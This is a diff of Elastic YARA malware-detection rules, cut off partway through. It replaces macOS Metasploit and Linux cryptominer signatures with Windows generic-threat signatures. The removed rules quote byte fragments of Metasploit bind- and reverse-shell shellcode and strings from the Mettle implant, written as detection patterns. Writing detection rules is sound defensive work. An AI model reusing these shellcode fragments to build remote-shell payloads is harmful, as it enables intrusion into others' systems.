ELASTIC_Windows_Generic_Threat_54B0Ec47 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Casdet (Linux.Cryptominer.Casdet)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "5d0d33be-e53e-4188-9957-e1af2a802867" - date = "2021-01-12" - modified = "2021-09-16" + id = "54b0ec47-79f3-4187-8253-805e7ad102ce" + date = "2024-01-03" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Casdet.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4b09115c876a8b610e1941c768100e03c963c76b250fdd5b12a74253ef9e5fb6" - logic_hash = "e3264f614e257d853070907866b838d1cb53c1f60f7a0123ec503f1d540a15d7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L489-L508" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9c14203069ff6003e7f408bed71e75394de7a6c1451266c59c5639360bf5718c" + logic_hash = "e3d74162a8874fe05042fec98d25b8db50e7f537566fd9f4e40f92bfe868259a" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "2d584f6815093d37bd45a01146034d910b95be51462f01f0d4fc4a70881dfda6" - severity = 100 + fingerprint = "2c3890010aad3c2b54cba08a62b5af6a678849a6b823627bf9e26c8693a89c60" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { C3 EB 05 48 89 C3 EB CF 48 8B BC 24 A0 00 00 00 48 85 FF 74 D7 48 } + $a1 = { 2D 2D 2D 2D 3D 5F 25 73 5F 25 2E 33 75 5F 25 2E 34 75 5F 25 2E 38 58 2E 25 2E 38 58 } + $a2 = { 25 73 2C 20 25 75 20 25 73 20 25 75 20 25 2E 32 75 3A 25 2E 32 75 3A 25 2E 32 75 20 25 63 25 2E 32 75 25 2E 32 75 } condition: all of them } -rule ELASTIC_Macos_Trojan_Metasploit_6Cab0Ec0 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Acf6222B : FILE MEMORY { meta: - description = "Detects Macos Trojan Metasploit (MacOS.Trojan.Metasploit)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "6cab0ec0-0ac5-4f43-8a10-1f46822a152b" - date = "2021-09-30" - modified = "2021-10-25" + id = "acf6222b-5859-4b18-a770-04f8fc7f48fd" + date = "2024-01-03" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Metasploit.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7ab5490dca314b442181f9a603252ad7985b719c8aa35ddb4c3aa4b26dcc8a42" - logic_hash = "c19fe812b74b034bfb42c0e2ee552d879ed038e054c5870b85e7e610d3184198" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L510-L528" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ce0def96be08193ab96817ce1279e8406746a76cfcf4bf44e394920d7acbcaa6" + logic_hash = "a284b6c163dbc022bd36f19fbc1d7ff70143bee566328ad23e7b8b79abd39e91" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e13c605d8f16b2b2e65c717a4716c25b3adaec069926385aff88b37e3db6e767" - severity = 100 + fingerprint = "1046de07f9594a6352a33d892da1b4dc227fdf52a8caf38e8f1532076232c7fc" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a = "mettlesploit! " ascii fullword + $a1 = { 83 7D 10 00 75 04 33 C0 5D C3 8B 4D 08 8B 55 0C FF 4D 10 74 0E 8A 01 84 C0 74 08 3A 02 75 04 41 42 EB ED 0F B6 01 0F B6 0A 2B C1 5D C3 55 8B EC 83 EC 24 56 57 8B 7D 08 33 F6 89 75 F8 } condition: all of them } -rule ELASTIC_Macos_Trojan_Metasploit_293Bfea9 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_5E718A0C : FILE MEMORY { meta: - description = "Detects Macos Trojan Metasploit (MacOS.Trojan.Metasploit)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "293bfea9-c5cf-4711-bec0-17a02ddae6f2" - date = "2021-09-30" - modified = "2021-10-25" + id = "5e718a0c-3c46-46f7-adfd-b0c3c75b865f" + date = "2024-01-03" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Metasploit.yar#L21-L42" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7ab5490dca314b442181f9a603252ad7985b719c8aa35ddb4c3aa4b26dcc8a42" - logic_hash = "b8bd0d034a6306f99333723d77724ae53c1a189dad3fad7417f2d2fde214c24a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L530-L548" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "430b9369b779208bd3976bd2adc3e63d3f71e5edfea30490e6e93040c1b3bac6" + logic_hash = "45068afeda7abae0fe922a21f8f768b6c74a6e0f8e9e8b1f68c3ddf92940bf9a" score = 75 - quality = 71 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "d47e8083268190465124585412aaa2b30da126083f26f3eda4620682afd1d66e" - severity = 100 + fingerprint = "b6f9b85f4438c3097b430495dee6ceef1a88bd5cece823656d9dd325e8d9d4a1" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a1 = "_webcam_get_frame" ascii fullword - $a2 = "_get_process_info" ascii fullword - $a3 = "process_new: got %zd byte executable to run in memory" ascii fullword - $a4 = "Dumping cert info:" ascii fullword + $a1 = { 44 3A 28 41 3B 3B 30 78 30 30 31 46 30 30 30 33 3B 3B 3B 42 41 29 28 41 3B 3B 30 78 30 30 31 30 30 30 30 33 3B 3B 3B 41 55 29 } condition: all of them } -rule ELASTIC_Macos_Trojan_Metasploit_448Fa81D : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Fac6D993 : FILE MEMORY { meta: - description = "Detects Macos Trojan Metasploit (MacOS.Trojan.Metasploit)" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "448fa81d-14c7-479b-8d1e-c245ee261ef6" - date = "2021-09-30" - modified = "2021-10-25" + id = "fac6d993-a9c5-4218-829d-d0f3a3b9a5a0" + date = "2024-01-03" + modified = "2024-01-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Metasploit.yar#L44-L64" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7ab5490dca314b442181f9a603252ad7985b719c8aa35ddb4c3aa4b26dcc8a42" - logic_hash = "ab0608920b9f632bad99e1358f21a88bc6048f46fca21a488a1a10b7ef1e42ae" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L550-L568" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f3e7c88e72cf0c1f4cbee588972fc1434065f7cc9bd95d52379bade1b8520278" + logic_hash = "3486793324dbe43c908432e1956bbbdb870beb4641da46b3786581fd3e78811a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ff040211f664f3f35cd4f4da0e5eb607ae3e490aae75ee97a8fb3cb0b08ecc1f" - severity = 100 + fingerprint = "7502d32cf94496b73e476c7521b84a40426676b335a86bdf1bce7146934efcee" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a1 = "/Users/vagrant/mettle/mettle/src/process.c" ascii fullword - $a2 = "/Users/vagrant/mettle/mettle/src/c2_http.c" ascii fullword - $a3 = "/Users/vagrant/mettle/mettle/src/mettle.c" ascii fullword + $a1 = { 83 E4 F8 81 EC 4C 04 00 00 53 8B D9 8B 4D 2C 33 C0 89 01 8B 4D 30 56 0F B6 B3 85 00 00 00 89 01 8B 4D 34 57 0F B6 BB 84 00 00 00 89 01 8B 4D 38 89 54 24 10 89 01 8D 44 24 48 50 FF 15 } condition: - any of them + all of them } -rule ELASTIC_Macos_Trojan_Metasploit_768Df39D : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_E7Eaa4Ca : FILE MEMORY { meta: - description = "Byte sequence based on Metasploit shell_reverse_tcp.rb" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "768df39d-7ee9-454e-82f8-5c7bd733c61a" - date = "2021-09-30" - modified = "2021-10-25" - reference = "https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Metasploit.yar#L66-L85" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "140ba93d57b27325f66b36132ecaab205663e3e582818baf377e050802c8d152" + id = "e7eaa4ca-45ee-42ea-9604-d9d569eed0aa" + date = "2024-01-04" + modified = "2024-01-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L570-L587" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "600da0c88dc0606e05f60ecd3b9a90469eef8ac7a702ef800c833f7fd17eb13e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d45230c1111bda417228e193c8657d2318b1d2cddfbd01c5c6f2ea1d0be27a46" - threat_name = "MacOS.Trojan.Metasploit" + fingerprint = "ede23e801a67bc43178eea87a83eb0ef32a74d48476a8273a25a7732af6f22a6" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a1 = { FF 4F E8 79 F6 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 50 } + $a = { C8 F7 C6 A8 13 F7 01 E9 2C 99 08 00 4C 03 D1 E9 } condition: all of them } -rule ELASTIC_Macos_Trojan_Metasploit_7Ce0B709 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_97703189 : FILE MEMORY { meta: - description = "Byte sequence based on Metasploit shell_bind_tcp.rb" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "7ce0b709-1d96-407c-8eca-6af64e5bdeef" - date = "2021-09-30" - modified = "2021-10-25" - reference = "https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/osx/x86/shell_bind_tcp.rb" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Metasploit.yar#L87-L106" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "56fc05ece464d562ff6e56247756454c940c07b03c4a4c783b2bae4d5807247a" + id = "97703189-bcac-4b6c-b0d4-9167f5e8085d" + date = "2024-01-04" + modified = "2024-01-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L589-L607" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "968ba3112c54f3437b9abb6137f633d919d75137d790af074df40a346891cfb5" + logic_hash = "318bc82d49e9a3467ec0e0086aaf1092d2aa7c589b5f16ce6fbb3778eda7ef0b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3eb7f78d2671e16c16a6d9783995ebb32e748612d32ed4f2442e9f9c1efc1698" - threat_name = "MacOS.Trojan.Metasploit" - severity = 100 + fingerprint = "9126c3aeaa4ed136424c20aa8e7a487131adc1ae22eb8ab4f514b4687855816f" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a1 = { FF 4F E4 79 F6 50 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 50 } + $a1 = { 55 8B EC 5D E9 2A 1C 00 00 8B FF 55 8B EC 8B 45 08 56 8B F1 C6 46 0C 00 85 C0 75 63 E8 6F 29 00 00 89 46 08 8B 48 6C 89 0E 8B 48 68 89 4E 04 8B 0E 3B 0D 98 06 49 00 74 12 8B 0D B4 05 49 00 85 } condition: all of them } -rule ELASTIC_Macos_Trojan_Metasploit_F11Ccdac : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_Ca0686E1 : FILE MEMORY { meta: - description = "Byte sequence based on Metasploit shell_find_port.rb" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "f11ccdac-be75-4ba8-800a-179297a40792" - date = "2021-09-30" - modified = "2021-10-25" - reference = "https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/osx/x86/shell_find_port.rb" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Metasploit.yar#L108-L127" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "fcf578d3e98b591b33cb6f4bec1b9e92a7e1a88f0b56f3c501f9089d2094289c" + id = "ca0686e1-001f-44d2-ae2f-51c473769723" + date = "2024-01-05" + modified = "2024-01-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L609-L627" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "15c7ce1bc55549efc86dea74a90f42fb4665fe15b14f760037897c772159a5b5" + logic_hash = "12b2ff66d1be6e2d27f24489b389b5c84660921e8de41653b2b425077cc87669" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fbc1a5b77ed485706ae38f996cd086253ea1d43d963cb497446e5b0f3d0f3f11" - threat_name = "MacOS.Trojan.Metasploit" - severity = 100 + fingerprint = "4663eefedb6f3f502adfb4f64278d1c535ba3a719d007a280e9943914121cd81" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a1 = { 50 6A 1F 58 CD 80 66 81 7F 02 04 D2 75 EE 50 } + $a1 = { 55 8B EC 51 53 8B 5D 08 56 57 8B F9 8B 77 10 8B C6 2B C3 89 75 FC 3B 45 0C 72 03 8B 45 0C 83 7F 14 10 72 02 8B 0F 8D 14 19 2B F0 8B CE 03 C2 2B CB 41 51 50 52 E8 62 1A 00 00 83 C4 0C 8B CF 56 } condition: all of them } -rule ELASTIC_Macos_Trojan_Metasploit_D9B16F4C : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_97C1A260 : FILE MEMORY { meta: - description = "Byte sequence based on Metasploit vforkshell_bind_tcp.rb" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "d9b16f4c-8cc9-42ce-95fa-8db06df9d582" - date = "2021-09-30" - modified = "2021-10-25" - reference = "https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Metasploit.yar#L129-L148" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "8e082878fb52f6314ec8c725dd279447ee8a0fc403c47ffd997712adb496e7c3" + id = "97c1a260-9b43-458e-a9ac-2391aee1bcb8" + date = "2024-01-07" + modified = "2024-01-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L629-L647" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "2cc85ebb1ef07948b1ddf1a793809b76ee61d78c07b8bf6e702c9b17346a20f1" + logic_hash = "5bd84cbdd4ba699c9e9d87e684071342b23138538bd83ffea8c524fcee26a59b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "cf5cfc372008ae98a0958722a7b23f576d6be3b5b07214d21594a48a87d92fca" - threat_name = "MacOS.Trojan.Metasploit" - severity = 100 + fingerprint = "9cd93a8def2d2fac61a5b37d82b97c18ce8bf3410aa6ec7531ec28378f5c98cc" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a1 = { 31 C0 99 50 40 50 40 50 52 B0 61 CD 80 0F 82 7E 00 00 00 89 C6 52 52 52 68 00 02 34 12 89 E3 6A } + $a1 = { 55 8B EC 51 53 56 57 E8 14 31 00 00 8B F0 85 F6 0F 84 39 01 00 00 8B 16 33 DB 8B CA 8D 82 90 00 00 00 3B D0 74 0E 8B 7D 08 39 39 74 09 83 C1 0C 3B C8 75 F5 8B CB 85 C9 0F 84 11 01 00 00 8B 79 } condition: all of them } -rule ELASTIC_Macos_Trojan_Metasploit_2992B917 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_A440F624 : FILE MEMORY { meta: - description = "Byte sequence based on Metasploit vforkshell_reverse_tcp.rb" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "2992b917-32bd-4fd8-8221-0d061239673d" - date = "2021-09-30" - modified = "2021-10-25" - reference = "https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Metasploit.yar#L150-L169" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "10056ffb719092f83ad236a63ef6fa1f40568e500c042bd737575997bb67a8ec" + id = "a440f624-c7ec-4f26-bfb5-982bae5f6887" + date = "2024-01-07" + modified = "2024-01-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L649-L668" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3564fec3d47dfafc7e9c662654865aed74aedeac7371af8a77e573ea92cbd072" + logic_hash = "23c759a0db5698b28a69232077a6b714f71e8eaa069d2f02a7d3efc48b178a2b" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "055129bc7931d0334928be00134c109ab36825997b2877958e0ca9006b55575e" - threat_name = "MacOS.Trojan.Metasploit" - severity = 100 + fingerprint = "0f538f8f4eb2e71fb74d8305a179fc2ad880ab5a4cfd37bd35b5da2629ed892c" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a1 = { 31 C0 99 50 40 50 40 50 52 B0 61 CD 80 72 6D 89 C7 52 52 68 7F 00 00 01 68 00 02 34 12 89 E3 6A } + $a1 = { 2E 20 49 50 20 3D 20 25 73 2C 20 50 6F 72 74 20 3D 20 25 64 2C 20 73 6B 20 3D 20 25 64 } + $a2 = { 2E 20 49 50 20 3D 20 25 73 2C 20 50 6F 72 74 20 3D 20 25 64 2C 20 4C 65 6E 20 3D 20 25 64 } condition: all of them } -rule ELASTIC_Macos_Trojan_Metasploit_27D409F1 : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_B577C086 : FILE MEMORY { meta: - description = "Byte sequence based on Metasploit x64 shell_bind_tcp.rb" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "27d409f1-80fd-4d07-815a-4741c48e0bf6" - date = "2021-09-30" - modified = "2021-10-25" - reference = "https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/osx/x64/shell_bind_tcp.rb" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Metasploit.yar#L171-L190" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "b757e0ab6665a3e4846c6bbe4386e9d9a730ece00a2453933ce771aec2dd716e" + id = "b577c086-37bd-4227-8cde-f15e2ce0d0ae" + date = "2024-01-07" + modified = "2024-01-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L670-L688" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "27dd61d4d9997738e63e813f8b8ea9d5cf1291eb02d20d1a2ad75ac8aa99459c" + logic_hash = "a7684340171415ee01e855706192cdffcccd6c82362707229b2c1d096f87dfa8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "43be41784449fc414c3e3bc7f4ca5827190fa10ac4cdd8500517e2aa6cce2a56" - threat_name = "MacOS.Trojan.Metasploit" - severity = 100 + fingerprint = "0de3cab973de067f2c10252bf761ced353de57c03c4b2e95db05ee3ca30259ea" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a1 = { B8 61 00 00 02 6A 02 5F 6A 01 5E 48 31 D2 } + $a1 = { 83 EC 24 83 7D 08 00 75 0A B8 9A FF FF FF E9 65 02 00 00 8B 45 08 89 45 FC 8B 4D FC 83 79 18 00 75 0A B8 9A FF FF FF E9 4C 02 00 00 8B 55 FC 83 7A 7C 00 74 0C 8B 45 08 50 E8 5F 06 00 } condition: all of them } -rule ELASTIC_Macos_Trojan_Metasploit_65A2394B : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_62E1F5Fc : FILE MEMORY { meta: - description = "Byte sequence based on Metasploit stages vforkshell.rb" - author = "Elastic Security" - id = "65a2394b-0e66-4cb5-b6aa-3909120f0a94" - date = "2021-09-30" - modified = "2021-10-25" - reference = "https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/stages/osx/x86/vforkshell.rb" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Metasploit.yar#L192-L211" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "f01f671b0bf9fa53aa3383c88ba871742f0e55dbdae4278f440ed29f35eb1ca1" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + author = "Elastic Security" + id = "62e1f5fc-325b-46e0-8c03-1a73e873ab16" + date = "2024-01-07" + modified = "2024-01-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L690-L710" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4a692e244a389af0339de8c2d429b541d6d763afb0a2b1bb20bee879330f2f42" + logic_hash = "76e21746ee396f13073b3db1e876246f01cef547d312691dff3dc895ea3a2b82" score = 75 - quality = 75 + quality = 69 tags = "FILE, MEMORY" - fingerprint = "082da76eb8da9315d495b79466366367f19170f93c0a29966858cb92145e38d7" - threat_name = "MacOS.Trojan.Metasploit" - severity = 100 + fingerprint = "64839df90109a0c706c0a3626ba6c4c2eaa5dcd564f0e9889ab9ad4f12e150fe" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a1 = { 31 DB 83 EB 01 43 53 57 53 B0 5A CD 80 72 43 83 } + $a1 = { 43 6C 69 65 6E 74 2E 48 61 6E 64 6C 65 5F 50 61 63 6B 65 74 } + $a2 = { 67 65 74 5F 73 45 78 70 59 65 61 72 } + $a3 = { 73 65 74 5F 73 45 78 70 59 65 61 72 } condition: all of them } -rule ELASTIC_Macos_Trojan_Metasploit_C7B7A90B : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_55D6A1Ab : FILE MEMORY { meta: - description = "Byte sequence based on Metasploit stager reverse_tcp.rb" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "c7b7a90b-aaf2-482d-bb95-dee20a75379e" - date = "2021-09-30" - modified = "2021-10-25" - reference = "https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/stagers/osx/x86/reverse_tcp.rb" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Metasploit.yar#L213-L232" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "d4b1f01bf8434dd69188d2ad0b376fad3a4d9c94ebe74d40f05019baf95b5496" + id = "55d6a1ab-2041-44a5-ae0e-23671fa2b001" + date = "2024-01-07" + modified = "2024-01-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Generic_Threat.yar#L712-L731" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1ca6ed610479b5aaaf193a2afed8f2ca1e32c0c5550a195d88f689caab60c6fb" + logic_hash = "4f3a0b2e45ae4e6a00f137798b700a0925fa6eb19ea6b871d7eeb565548888ba" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "c4b2711417f5616ca462149882a7f33ce53dd1b8947be62fe0b818c51e4f4b2f" - threat_name = "MacOS.Trojan.Metasploit" - severity = 100 + fingerprint = "cd81b61929b18d59630814718443c4b158f9dcc89c7d03a46a531ffc5843f585" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "windows" strings: - $a1 = { 31 C0 99 50 40 50 40 50 52 B0 61 CD 80 72 } + $a1 = { 51 51 31 33 37 32 33 39 32 34 38 20 } + $a2 = { 74 65 6E 63 65 6E 74 3A 2F 2F 6D 65 73 73 61 67 65 2F 3F 75 69 6E 3D 31 33 37 32 33 39 32 34 38 26 53 69 74 65 3D 63 66 } condition: all of them } -rule ELASTIC_Macos_Trojan_Metasploit_4Bd6Aaca : FILE MEMORY +rule ELASTIC_Windows_Generic_Threat_F7D3Cdfd : FILE MEMORY { meta: - description = "Byte sequence based on Metasploit stager x86 bind_tcp.rb" + description = "Detects Windows Generic Threat (Windows.Generic.Threat)" author = "Elastic Security" - id = "4bd6aaca-f519-4d20-b3af-d376e0322a7e" - date = "2021-09-30" - modified = "2021-10-25" - reference = "https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/stagers/osx/x86/bind_tcp.rb" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Metasploit.yar#L234-L253" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "a3de610ced90679f6fa0dcdf7890a64369c774839ea30018a7ef6fe9289d3d17" + id = "f7d3cdfd-72eb-4298-b3ff-432f5c4347c9" + date = "2024-01-07" + modified = "2024-01-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = 